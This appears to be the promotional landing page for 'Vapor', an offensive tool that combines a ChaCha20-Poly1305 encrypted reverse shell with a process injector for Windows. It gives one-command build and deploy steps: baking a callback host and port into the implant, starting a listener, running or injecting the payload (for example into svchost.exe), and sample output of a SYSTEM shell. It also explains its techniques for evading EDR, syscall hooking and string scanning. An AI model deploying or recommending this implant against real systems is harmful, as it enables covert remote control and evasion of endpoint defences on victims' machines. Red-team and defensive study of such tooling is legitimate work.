Encrypted shell. Direct syscalls.

ChaCha20-Poly1305 encrypted reverse shell and process injector in pure x86_64 NASM assembly. Hell's Gate syscalls, PEB-walk API resolution, zero dependencies.

Download Latest View Source

vapor

$ ./build.sh 10.10.14.1 443
[+] Generated 256-bit PSK
[+] Assembled vapor.bin (3,612 bytes)
[+] Linked vapor.exe
[+] Built injector.exe (vapor.bin embedded)

# Start listener
$ python3 listener.py --lport 443 --key a1b2c3...ef
[*] Listening on 0.0.0.0:443
[*] Connection from 10.10.10.5:49812
[*] ChaCha20-Poly1305 handshake complete

vapor> whoami
nt authority\system

FEATURES

Pure assembly, no compromises

RFC 8439 authenticated encryption. Direct NT syscalls. Early Bird APC injection. All in ~3.6 KB of position-independent code.

ChaCha20-Poly1305 AEAD

Full RFC 8439 authenticated encryption in pure x86_64 assembly. 256-bit pre-shared key, fresh random 12-byte nonce per message via SystemFunction036 (RtlGenRandom). Tampered payloads silently rejected.

Wire format:
[len 4B][nonce 12B][ciphertext][mac 16B]
ChaCha20 block 0 → Poly1305 OTK
Counter starts at 1 per RFC 8439

~3.6KB

Shellcode

Hell's Gate Syscalls

SSN extraction from ntdll stubs at runtime. Halo's Gate fallback scans neighbor stubs when hooked. Indirect gadget execution — return address traces to ntdll.

PEB Walk Resolution

All Windows APIs resolved via PEB walking and ror13 hash matching. No import table, no API name strings. Handles forwarded exports like SystemFunction036.

Early Bird APC

Target process created suspended. Shellcode written to remote memory (RW to RX) via NT syscalls, queued as APC. Fires before entry point — before EDR hooks.

Dependencies

Encrypted Reverse Shell

Piped command execution via CreateProcessA with cmd.exe /c. Stdout and stderr captured through anonymous pipes with PeekNamedPipe polling. 30-second timeout. All traffic authenticated and encrypted.

vapor> whoami
nt authority\system
vapor> dir C:\Users
Volume in drive C has no label.
Directory of C:\Users

Dual Output

Builds as raw PIC shellcode (vapor.bin) for injection and a minimal PE (vapor.exe) for direct execution. Same source, same crypto, two deployment paths.

ARCHITECTURE

Four-layer implant design

API resolution, networking, cryptography, and command execution — all in pure x86_64 NASM with no external dependencies.

API Resolution

PEB walk to InMemoryOrderModuleList. ror13 hash matching across kernel32, ws2_32, advapi32 export tables. Forwarded export handling for cryptbase.

Transport

Raw TCP socket via WSASocketA and connect. WSAStartup initialization, configurable LHOST/LPORT baked in at assembly time.

Cryptography

ChaCha20 quarter-round in registers, 10 double-rounds. Poly1305 with full mod 2^130-5 arithmetic. AEAD per RFC 8439 Section 2.8.

Execution

CreateProcessA with cmd.exe /c. Anonymous pipe capture of stdout+stderr. PeekNamedPipe polling with 30s timeout. Nonce-per-message response encryption.

GETTING STARTED

Build and deploy

One command generates a random PSK, assembles the implant, builds the injector, and prints the listener command.

build

$ git clone https://github.com/Real-Fruit-Snacks/Vapor.git
$ cd Vapor

# One-command build
$ ./build.sh 10.10.14.1 443

# Or with make directly
$ make LHOST=10.10.14.1 LPORT=443 KEY=<hex> all

deploy

# Start listener
$ python3 listener.py --lport 443 --key <key>

# Direct execution
PS> .\vapor.exe

# Or inject into a process
PS> .\injector.exe

# Custom injection target
$ make TARGET="svchost.exe" all

DETECTION AWARENESS

Know the boundaries

Evades

Import table analysis — zero static imports
Userland API hooking — indirect syscalls via ntdll
String scanning — API names resolved by hash
Traffic inspection — ChaCha20-Poly1305 AEAD
Early hook initialization — APC fires first

Visible To

ETW / kernel callbacks — kernel-level tracing
AMSI — script-based detection
Network metadata — raw TCP connection visible
Memory forensics — shellcode in process memory
Behavioral EDR — syscall pattern analysis